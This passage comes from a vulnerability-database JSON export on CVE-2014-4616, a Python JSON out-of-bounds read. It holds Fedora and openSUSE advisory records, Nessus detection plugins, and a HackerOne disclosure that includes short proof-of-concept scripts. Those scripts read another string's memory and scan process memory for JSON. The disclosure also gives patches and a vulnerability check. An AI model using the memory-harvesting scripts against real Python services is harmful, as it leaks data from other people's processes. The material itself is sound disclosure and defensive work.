"cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especially how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. 
", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-11-10T06:36:31", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: python3-3.4.1-16.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-10T06:36:31", "id": "FEDORA:AE30560F3A00", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. Note that documentation for Python is provided in the python-docs package. 
This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "edition": 2, "cvss3": {}, "published": "2014-07-17T04:29:36", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python-2.7.5-13.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "modified": "2014-07-17T04:29:36", "id": "FEDORA:096D7228ED", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especially how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. 
", "edition": 2, "cvss3": {}, "published": "2014-07-17T04:28:18", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-9.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616"], "modified": "2014-07-17T04:28:18", "id": "FEDORA:4FCC221CAB", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especially how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. 
", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-11-09T15:45:22", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: python3-3.3.2-18.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-09T15:45:22", "id": "FEDORA:E272360D99E0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especially how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. 
", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2014-11-13T18:14:28", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-10.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4238", "CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-13T18:14:28", "id": "FEDORA:79A3360CE877", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:12", "bounty": 1500.0, "description": "Python 2 and 3 are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking.\n\nThe sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. 
The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.\n\nLet me clarify:\n\nThis is Python-3.4.0/Modules/_json.c:\n\n```\n1035 static PyObject *\n1036 scanner_call(PyObject *self, PyObject *args, PyObject *kwds)\n1037 {\n1038 /* Python callable interface to scan_once_{str,unicode} */\n1039 PyObject *pystr;\n1040 PyObject *rval;\n1041 Py_ssize_t idx;\n1042 Py_ssize_t next_idx = -1;\n1043 static char *kwlist[] = {\"string\", \"idx\", NULL};\n1044 PyScannerObject *s;\n1045 assert(PyScanner_Check(self));\n1046 s = (PyScannerObject *)self;\n1047 if (!PyArg_ParseTupleAndKeywords(args, kwds, \"On:scan_once\", kwlist, &pystr, &idx))\n1048 return NULL;\n1049\n1050 if (PyUnicode_Check(pystr)) {\n1051 rval = scan_once_unicode(s, pystr, idx, &next_idx);\n1052 }\n1053 else {\n1054 PyErr_Format(PyExc_TypeError,\n1055 \"first argument must be a string, not %.80s\",\n1056 Py_TYPE(pystr)->tp_name);\n1057 return NULL;\n1058 }\n1059 PyDict_Clear(s->memo);\n1060 if (rval == NULL)\n1061 return NULL;\n1062 return _build_rval_index_tuple(rval, next_idx);\n1063 }\n```\n\nAs you can see on line 1047, PyArg_ParseTupleAndKeywords takes an 'n' as the format unit for 'end' (the index argument, which is named 'idx' in the listing above), which, as can be learned from this page ( https://docs.python.org/3/c-api/arg.html ), means:\n\n```\n n (int) [Py_ssize_t]\n Convert a Python integer to a C Py_ssize_t.\n```\n\nThis means it accepts a SIGNED integer value, thus allowing a negative value to be supplied as the 'end' parameter.\n\nThen on to scan_once_unicode, to which execution gets transferred through line 1051 
of the code above.\n\n```\n922 static PyObject *\n923 scan_once_unicode(PyScannerObject *s, PyObject *pystr, Py_ssize_t\nidx, Py_ssize_t *next_idx_ptr)\n924 {\n925 /* Read one JSON term (of any kind) from PyUnicode pystr.\n926 idx is the index of the first character of the term\n927 *next_idx_ptr is a return-by-reference index to the first character after\n928 the number.\n929\n930 Returns a new PyObject representation of the term.\n931 */\n932 PyObject *res;\n933 void *str;\n934 int kind;\n935 Py_ssize_t length;\n936\n937 if (PyUnicode_READY(pystr) == -1)\n938 return NULL;\n939\n940 str = PyUnicode_DATA(pystr);\n941 kind = PyUnicode_KIND(pystr);\n942 length = PyUnicode_GET_LENGTH(pystr);\n943\n944 if (idx >= length) {\n945 raise_stop_iteration(idx);\n946 return NULL;\n947 }\n```\n\nHere we see that 'length' is set to the length of the string parameter. This will always be a positive value. On line 945 it is checked whether idx is equal or higher than length; this can never be true in the case of a negative index value.\n\n```\n949 switch (PyUnicode_READ(kind, str, idx)) {\n```\n\nPyUnicode_READ is defined as follows ( in Python-3.4.0/Include/unicodeobject.h ):\n\n```\n516 /* Read a code point from the string's canonical representation. No checks\n517 or ready calls are performed. */\n518 #define PyUnicode_READ(kind, data, index) \\\n519 ((Py_UCS4) \\\n520 ((kind) == PyUnicode_1BYTE_KIND ? \\\n521 ((const Py_UCS1 *)(data))[(index)] : \\\n522 ((kind) == PyUnicode_2BYTE_KIND ? \\\n523 ((const Py_UCS2 *)(data))[(index)] : \\\n524 ((const Py_UCS4 *)(data))[(index)] \\\n525 ) \\\n526 ))\n```\n\nHere we can see that index, which is negative in our example, is used as an array index. 
Since it is negative, it will internally wrap around and point to an address BELOW the address of 'data'.\n\nSo, if a certain negative value (such as -0x7FFFFFFF) is supplied and data[index] will effectively point to an invalid or read-protected page in memory, the Python executable will segfault.\n\nBut there's more. Instead of making it point to an invalid page, let's make it point to something valid:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3 a = \"99448866\"\n4 b = \"88445522\"\n5 diff = id(a) - id(b)\n6 print(\"Difference is \" + hex(diff))\n7 print j.raw_decode(b)\n8 print j.raw_decode(b, diff)\n```\n\nOutput of this script is:\n\nDifference is -0x30\n(88445522, 8)\n(99448866, -40)\n\nThe difference between the address of 'a' and the address of 'b' is calculated and supplied as an index to the raw_decode function.\nInternally the address wraps around and we get to see the contents of 'a' while having supplied 'b' as a parameter.\n\nWe can use this harvester to scan memory for valid JSON strings:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3 a = \"x\" * 1000\n4 for x in range(0, 600000):\n5 try:\n6 print j.raw_decode(a, 0 - x)\n7 except:\n8 pass\n```\n\nThere is one drawback, however. 
We cannot decode strings in this manner because:\n\n```\n296 static PyObject *\n297 scanstring_unicode(PyObject *pystr, Py_ssize_t end, int strict, Py_ssize_t *next_end_ptr)\n298 {\n299 /* Read the JSON string from PyUnicode pystr.\n300 end is the index of the first character after the quote.\n301 if strict is zero then literal control characters are allowed\n302 *next_end_ptr is a return-by-reference index of the character\n303 after the end quote\n304\n305 Return value is a new PyUnicode\n306 */\n307 PyObject *rval = NULL;\n308 Py_ssize_t len;\n309 Py_ssize_t begin = end - 1;\n310 Py_ssize_t next /* = begin */;\n311 const void *buf;\n312 int kind;\n313 PyObject *chunks = NULL;\n314 PyObject *chunk = NULL;\n315\n316 if (PyUnicode_READY(pystr) == -1)\n317 return 0;\n318\n319 len = PyUnicode_GET_LENGTH(pystr);\n320 buf = PyUnicode_DATA(pystr);\n321 kind = PyUnicode_KIND(pystr);\n322\n323 if (end < 0 || len < end) {\n324 PyErr_SetString(PyExc_ValueError, \"end is out of bounds\");\n325 goto bail;\n```\n\nthis code actually performs a bounds check by asserting that end (which is our index) isn't negative.\n\nHowever, I successfully ran harvesting tests that could extract JSON-encoded arrays of numerical values (such as [10, 20, 40, 70] ) from the process memory without any problem or difficulty.\n\nGiven the ubiquity of JSON parsing in Python applications and the limited amount of prerequisites and conditions under which this bug can be exploited, it is evident that this issue could have serious security implications in some cases.\n\nHere is a patch for 3.4.0:\n\n```\n--- _json_old.c 2014-04-12 17:47:08.749012372 +0200\n+++ _json.c 2014-04-12 17:44:52.253011645 +0200\n@@ -941,7 +941,7 @@\n kind = PyUnicode_KIND(pystr);\n length = PyUnicode_GET_LENGTH(pystr);\n\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n raise_stop_iteration(idx);\n return NULL;\n }\n```\n\nAnd here is a patch for 2.7.6:\n\n```\n--- _json_old.c 2014-04-12 17:57:14.365015601 +0200\n+++ 
_json.c 2014-04-12 18:04:25.149017898 +0200\n@@ -1491,7 +1491,7 @@\n PyObject *res;\n char *str = PyString_AS_STRING(pystr);\n Py_ssize_t length = PyString_GET_SIZE(pystr);\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n PyErr_SetNone(PyExc_StopIteration);\n return NULL;\n }\n@@ -1578,7 +1578,7 @@\n PyObject *res;\n Py_UNICODE *str = PyUnicode_AS_UNICODE(pystr);\n Py_ssize_t length = PyUnicode_GET_SIZE(pystr);\n- if (idx >= length) {\n+ if ( idx < 0 || idx >= length) {\n PyErr_SetNone(PyExc_StopIteration);\n return NULL;\n }\n```\n\n\nHere is a script that checks whether the Python binary that executes it is vulnerable:\n\n```\n1 from json import JSONDecoder\n2 j = JSONDecoder()\n3\n4 a = '128931233'\n5 b = \"472389423\"\n6\n7 if id(a) < id(b):\n8 x = a\n9 y = b\n10 else:\n11 x = b\n12 y = a\n13\n14 diff = id(x) - id(y)\n15\n16 try:\n17 j.raw_decode(y, diff)\n18 print(\"Vulnerable\")\n19 except:\n20 print(\"Not vulnerable\")\n```\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2014-05-16T23:14:13", "type": "hackerone", "title": "Python (IBB): Python vulnerability: reading arbitrary process memory", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-06-20T05:54:36", "id": "H1:12297", "href": "https://hackerone.com/reports/12297", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2022-04-16T14:07:47", "description": "Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-07-17T00:00:00", "type": "nessus", "title": "Fedora 19 : python3-3.3.2-9.fc19 (2014-8035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-8035.NASL", "href": "https://www.tenable.com/plugins/nessus/76540", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-8035.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76540);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-8035\");\n\n script_name(english:\"Fedora 19 : python3-3.3.2-9.fc19 (2014-8035)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4616\n\nNote that 
Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135423.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?94088bd1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 
audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"python3-3.3.2-9.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:08:04", "description": "Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-07-17T00:00:00", "type": "nessus", "title": "Fedora 19 : python-2.7.5-13.fc19 (2014-7772)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-7772.NASL", "href": "https://www.tenable.com/plugins/nessus/76539", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-7772.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76539);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-7772\");\n\n script_name(english:\"Fedora 19 : python-2.7.5-13.fc19 (2014-7772)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4616\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135433.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cb633cbb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" 
>!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"python-2.7.5-13.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:08:09", "description": "python and python3 were updated to fix one security issue.\n\nThis security issue was fixed :\n\n - Missing boundary check in JSON module (CVE-2014-4616)", "cvss3": {"score": 5.9, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-07-14T00:00:00", "type": "nessus", "title": "openSUSE Security Update : python / python3 (openSUSE-SU-2014:0890-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libpython2_7-1_0", "p-cpe:/a:novell:opensuse:libpython2_7-1_0-32bit", "p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo", "p-cpe:/a:novell:opensuse:libpython2_7-1_0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libpython3_3m1_0", "p-cpe:/a:novell:opensuse:libpython3_3m1_0-32bit", "p-cpe:/a:novell:opensuse:libpython3_3m1_0-debuginfo", 
"p-cpe:/a:novell:opensuse:libpython3_3m1_0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python", "p-cpe:/a:novell:opensuse:python-32bit", "p-cpe:/a:novell:opensuse:python-base", "p-cpe:/a:novell:opensuse:python-base-32bit", "p-cpe:/a:novell:opensuse:python-base-debuginfo", "p-cpe:/a:novell:opensuse:python-base-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python-base-debugsource", "p-cpe:/a:novell:opensuse:python-curses", "p-cpe:/a:novell:opensuse:python-curses-debuginfo", "p-cpe:/a:novell:opensuse:python-debuginfo", "p-cpe:/a:novell:opensuse:python-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python-debugsource", "p-cpe:/a:novell:opensuse:python-demo", "p-cpe:/a:novell:opensuse:python-devel", "p-cpe:/a:novell:opensuse:python-doc-pdf", "p-cpe:/a:novell:opensuse:python-gdbm", "p-cpe:/a:novell:opensuse:python-gdbm-debuginfo", "p-cpe:/a:novell:opensuse:python-idle", "p-cpe:/a:novell:opensuse:python-tk", "p-cpe:/a:novell:opensuse:python-tk-debuginfo", "p-cpe:/a:novell:opensuse:python-xml", "p-cpe:/a:novell:opensuse:python-xml-debuginfo", "p-cpe:/a:novell:opensuse:python3", "p-cpe:/a:novell:opensuse:python3-32bit", "p-cpe:/a:novell:opensuse:python3-base", "p-cpe:/a:novell:opensuse:python3-base-32bit", "p-cpe:/a:novell:opensuse:python3-base-debuginfo", "p-cpe:/a:novell:opensuse:python3-base-debuginfo-32bit", "p-cpe:/a:novell:opensuse:python3-base-debugsource", "p-cpe:/a:novell:opensuse:python3-curses", "p-cpe:/a:novell:opensuse:python3-curses-debuginfo", "p-cpe:/a:novell:opensuse:python3-dbm", 